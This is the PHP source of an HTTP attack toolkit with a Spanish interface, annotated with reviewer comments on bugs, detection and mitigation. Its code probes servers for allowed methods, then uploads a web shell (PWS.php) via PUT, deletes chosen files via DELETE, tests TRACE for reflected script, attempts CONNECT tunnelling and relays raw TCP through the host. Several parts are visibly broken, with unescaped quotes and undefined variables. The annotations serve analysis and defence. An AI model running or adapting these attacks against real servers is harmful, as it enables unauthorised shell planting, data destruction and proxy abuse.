consola.php


<h2>Consola HTTP</h2>
<form Method="POST" Action="">
<textarea name="consola" rows="20" cols="100">
<?php
// Raw TCP "console": the textarea contents are written verbatim to
// $host:$puerto and the reply is echoed back into the same textarea.
// $host, $puerto and $TimeOut are not defined in this file. It is included
// from opt() in functions.php, which defines them as locals; when it is
// included directly from index.php (?atack=consola) they appear undefined.
// Risk/detection note: this makes the hosting web server a relay for
// arbitrary bytes to any host/port — watch for unexpected outbound
// connections from the web tier and apply egress filtering.
if(isset($_POST["consola"])) { $consola = $_POST["consola"];
// &$errno / &$errstr is legacy call-time pass-by-reference syntax.
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
if(!$sock) {
echo "Puerto $puerto Cerrado";
}else{
// The payload is sent as typed, terminated by a blank line (LF only, not CRLF).
$head = @fputs($sock, "$consola\n\n");
while(!feof($sock) ) {
// Each reply line is HTML-escaped before it lands inside the <textarea>.
// $datos is never initialised; the first ".=" operates on an undefined variable.
$datos .= htmlentities(fgets($sock, 4096));
}
}
// On a failed connect nothing was appended, so this prints an empty value.
echo $datos;
}
// Close the textarea and carry host/port forward as hidden fields. They
// are not escaped here; opt() applied htmlentities() to $host and required
// $puerto to be numeric, but no such guarantee holds on other include paths.
echo '</textarea>
<input type="hidden" name="puerto" value="'.$puerto.'"><input type="hidden" name="host" value="'.$host.'">
<br><input type="submit" value="OK">
</form>';
?>


index.php

<?php
// Entry point: draws the host/port form, runs the OPTIONS probe, then
// dispatches on the "atack" query parameter.
include("functions.php");

formulario();
opt();
// The bare words put, trace, delete, consola, connect are undefined
// constants; PHP 7 and earlier resolve them to their own names as strings
// (with a notice that opt()'s error_reporting(0) hides).
if (isset($_GET["atack"])) switch($_GET["atack"]) {
case put:
put();
break;
case trace:
trace();
break;
case delete:
// delete.php includes functions.php a second time, redeclaring the
// functions that were already loaded above.
include("delete.php");
break;
case consola:
// Included here at file scope, so the $host/$puerto/$TimeOut that
// consola.php relies on are not defined.
include("consola.php");
break;
case connect:
connect();
break;
default:
// formulario() has already written to the response body, so this
// header is emitted after output has started.
header("Location: index.php");
break;
}

?>



functions.php

<?php

###################################### FORMULARIO ###############################
function formulario()
{
// Prints the host/port entry form. Both fields are pre-filled from
// $_REQUEST (GET or POST) after htmlentities(), so they are attribute-safe.
// NOTE(review): the unescaped double quotes inside this double-quoted
// string look like escaping lost during extraction — confirm against the
// original before treating the quoting as intended.
echo"<html>
<center>
<title>HTTP Attack ToolKit By UxMal & InyeXion</title>
<form method="POST" action="">
<h1>HTTP Atack ToolKit By InyeXion & UxMal</h1>
<a>Host: <input name="host" size="17" type="text" value="".htmlentities($_REQUEST["host"]).""></a><br>
<a>Puerto: <input name="puerto" size="17" type="text" value="".htmlentities($_REQUEST["puerto"]).""></a><br>
<input type="submit" value="Scannear!">
<br>
</form></html>";
}

######################################## OPCIONES #################################
function opt()
{
// Probe: connect to host:port, send "OPTIONS / HTTP/1.0", pull the
// "Server: " and "Allow: " headers out of the reply, and offer a follow-up
// link for each method the server advertises. Ends by including
// consola.php, which depends on the $host/$puerto/$TimeOut locals below.
// Detection note: the probe carries no Host or User-Agent header and uses
// bare LF line endings — easy to spot in access/WAF logs.
// Mitigation note: restrict allowed methods (PUT/DELETE/TRACE/CONNECT off
// where unused) and suppress the Server banner.
error_reporting(0);   // silences the notices the uninitialised variables below would raise
set_time_limit(0);    // the read loop blocks until the peer closes the socket
$TimeOut = 2;         // connect timeout in seconds; also visible to the included consola.php

if (isset($_POST["host"]) && isset($_POST["puerto"]))
{
// htmlentities() is output encoding, not hostname validation; the encoded
// value is what gets passed to fsockopen() and interpolated into the links.
$host = htmlentities($_POST["host"]);

if(is_numeric($_POST["puerto"]))
{
$puerto = htmlentities($_POST["puerto"]);
}else{
print "Solo Numeros!";
exit();
}
// $TimeOut is always 2 here, so only the else branch is reachable.
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
// &$errno / &$errstr is legacy call-time pass-by-reference syntax.
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
echo "<h2>Puerto $puerto Cerrado</h2><br>";
exit();
}
// Dead code: $socket is opened to whatever ?header= names (port 80) and
// never used — a stray outbound connection to a caller-chosen host.
$header=htmlentities($_GET["header"]);
$socket = @fsockopen($header, 80, &$errno, &$errstr, 10);
$head = @fputs($sock, "OPTIONS / HTTP/1.0\n\n");

// Read until the server closes; every line is HTML-escaped first.
// $buffer is not initialised before the first ".=".
while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096));
}
// Crude header extraction: the text after the first "Server: " up to the
// next newline. If the header is absent, explode() yields one element,
// $todo is undefined and $server ends up empty.
list($basura, $todo) = explode("Server: ", $buffer);
list($server, $basura) = explode("\n", $todo);
unset($basura, $todo);

// Same for "Allow: " — the method list the server volunteers.
list($basura, $todo) = explode("Allow: ", $buffer);
list($allow, $basura) = explode("\n", $todo);
unset($basura, $todo);

// Both values come from the htmlentities()-escaped buffer.
echo "<b>Servidor: $server</b><br>";
echo "<b>Metodos Permitidos: $allow</b><br>";

// ereg() is POSIX regex (removed in PHP 7). Each match adds a link that
// re-enters index.php with ?atack=<method>&host=...&puerto=...
if(ereg(" PUT, ", $allow)) echo "<br><a>Se ha Detectado El Metodo PUT, desea atacar? <a href="?atack=put&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
if(ereg(" DELETE, ", $allow))
{
echo "<br><a>Se ha Detectado El Metodo DELETE";
// This form POSTs host/puerto/borrar/subx to delete.php.
echo "
<center><form action="delete.php" method="POST">
<input type="hidden" name="host" value="".$host."">
<input type="hidden" name="puerto" value="".$puerto."">
<b>Especifica el archivo a borrar: </b><input type="text" name="borrar">
<input type="submit" name="subx" value="Borrar">
</form></center><hr>";
}
if(ereg(" TRACE", $allow)) echo "<br><a>Se ha Detectado El Metodo TRACE, desea atacar? <a href="?atack=trace&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
if(ereg(" CONNECT, ", $allow)) echo "<br><a>Altas Posibilidades De Ataque MITM, Desea Probar Un Ataque Tunneling? <a href="?atack=connect&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
// consola.php reads $host, $puerto and $TimeOut from this function's scope.
include("consola.php");

}
}

######################################### PUT #####################################
function put()
{
// Sends the local file PWS.php to the target with an HTTP PUT and reports
// an outcome based on the reply.
// Mitigation note: PUT must be disabled or require authentication.
// Detection note: a PUT for /PWS.php using HTTP/1.0, LF-only line endings,
// two Content-Type headers and a Proxy-Connection header on a non-proxy
// request are all visible in access logs.
$shell = "PWS.php";   // local file read below; must exist next to this script
if (isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
// Unlike opt(), a non-numeric port leaves $puerto unset instead of exiting.
if(is_numeric($_GET["puerto"]))
{
$puerto = htmlentities($_GET["puerto"]);
}
// $TimeOut is not assigned in this scope, so the no-timeout branch is taken.
if(!$TimeOut) $sock = @fsockopen($host, $puerto); else $sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
if(!$sock) {
echo "<h2>Puerto $puerto Cerrado</h2><br>";
exit();
}
// Slurp the whole payload; Content-Length is its byte length (strlen).
$file = fopen($shell, "r");
$codigo = fread($file, filesize($shell));
fclose($file);
$lenght = strlen($codigo);
$head = @fputs($sock, "PUT /PWS.php HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\nContent-Type: multipart/form-data\nContent-Length: $lenght\nContent-Type: text/html\n\n$codigo\n\n");

// Reply is HTML-escaped line by line; $buffer starts undefined.
while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
// Outcome messages; $host and $buffer are undefined if the branch above was skipped.
$error = "<br><br><b>Ataque Fallido, No Tenemos Permisos :(, Puedes Intentar con el header: Authorization.</b>";
$ok = "<br><br><b>Ataque Logrado :), Disfrutalo: http://$host/PWS.php</b>";

// The bracket expressions are POSIX character classes, not literal status
// lines, so these tests do not check for a specific HTTP status.
if(ereg("[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]+[HTTP/1.1 403 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]+[HTTP/1.1 302 ]",$buffer))
{
echo $ok;
}

// Printed unconditionally, regardless of the reply.
echo "<br><b>Posible Desborde de Buffer en Metodo PUT</b><br>";
}

######################################## TRACE ###################################
function trace()
{
// Sends a TRACE request carrying a custom header with a <script> marker
// and echoes the reply; a reflecting server returns the marker text.
// Mitigation note: disable TRACE (Apache: TraceEnable off).
// Detection note: any TRACE method in access logs is worth alerting on.
$shell = "PWS.php";   // unused in this function
if (isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
// Non-numeric port leaves $puerto unset; no exit here.
if(is_numeric($_GET["puerto"]))
{
$puerto = htmlentities($_GET["puerto"]);
}
// $TimeOut is not assigned in this scope, so the no-timeout branch is taken.
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
echo "<h2>Puerto $puerto Cerrado</h2><br>";
exit();
}

$head = @fputs($sock, "TRACE / HTTP/1.0\nHost: $host\nXSS: <script>alert("XSS en TRACE")</script>\n\n");

// Unlike opt(), put() and connect(), the reply is echoed WITHOUT
// htmlentities(): any markup in the remote response — including the
// reflected marker — is rendered in the operator's own browser.
while(!feof($sock) ) {
$buffer .= fgets($sock, 4096); $buffer .= "<br>";
}
echo $buffer;
// ereg() is POSIX regex (removed in PHP 7). First test: marker reflected;
// second: the request line itself came back.
if(ereg(""XSS en TRACE"", $buffer)) echo "<br><br><b>Vulnerable a XSS :)</b><br>";
if(ereg("TRACE / HTTP/1.0", $buffer)) echo "<br><b>Posibilidad de Ataques DoS, Mediante Consumo de Banda :)</b><br>";
}
}

#################################### CONNECT ################################
function connect()
{
// Sends "CONNECT www.google.com:80" to the target to see whether it acts
// as a forward proxy and tunnels arbitrary TCP.
// Mitigation note: only intended proxies should accept CONNECT, and those
// should restrict destinations. Detection note: CONNECT requests arriving
// at an origin server.
if(isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
// Non-numeric port leaves $puerto unset; $puerto is not passed through
// htmlentities() here, unlike put()/trace().
if(is_numeric($_GET["puerto"])) $puerto = $_GET["puerto"];
// $TimeOut is not assigned in this scope, so the no-timeout branch is taken.
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
echo "<h2>Puerto $puerto Cerrado</h2><br>";
exit();
}

$head = @fputs($sock, "CONNECT www.google.com:80 HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\n\n");

// Reply is HTML-escaped line by line; $buffer starts undefined.
while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
// Outcome messages; $buffer is undefined if the branch above was skipped.
$error = "<br><br><b>Ataque Tuneling Fallido.</b>";
$ok = "<br><br><b>Ataque Tunneling Correcto :)</b>";

// The bracket expressions are POSIX character classes, not literal status
// lines, so these tests do not check for a specific HTTP status.
if(ereg("[HTTP/1.1 400 ]+[HTTP/1.1 405 ]+[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]",$buffer))
{
echo $ok;
}
}

delete.php

<?php
// DELETE form handler: redraws the form, re-runs the OPTIONS probe (opt()
// only probes when host/puerto arrived via POST, and exit()s if the port is
// closed), then sends "DELETE /<borrar>" to the target.
// Mitigation note: DELETE must be disabled or authenticated.
// Detection note: DELETE with HTTP/1.0, no User-Agent, LF-only line endings
// and a Proxy-Connection header on a non-proxy request.
include("functions.php");
formulario();
opt();
if (isset($_POST["host"]) and isset($_POST["puerto"]) and isset($_POST["subx"])) {
// $borrar is interpolated into the request line without any validation.
$borrar = $_POST["borrar"];
// The guard checks $_POST, but host/port are read from $_GET below, so they
// are empty unless the same values also appear in the query string.
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"]))
{
$puerto = $_GET["puerto"];
}
// $TimeOut is a local of opt() and not visible here: the no-timeout branch is taken.
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
echo "<h2>Puerto $puerto Cerrado</h2><br>";
exit();
}
$head = @fputs($sock, "DELETE /$borrar HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\n\n");
// Unlike the functions in functions.php, $buffer is initialised before the read loop.
$buffer = "";
while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
// Outcome messages; $buffer is undefined if the branch above was skipped.
$error = "<br><br><b>Ataque Fallido, No Tenemos Permisos :(, Puedes Intentar con el header: Authorization.</b>";
$ok = "<br><br><b>Ataque Logrado :)</b>";

// The bracket expressions are POSIX character classes, not literal status
// lines, so these tests do not check for a specific HTTP status.
if(ereg("[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]+[HTTP/1.1 302 ]",$buffer))
{
echo $ok;
}
?>
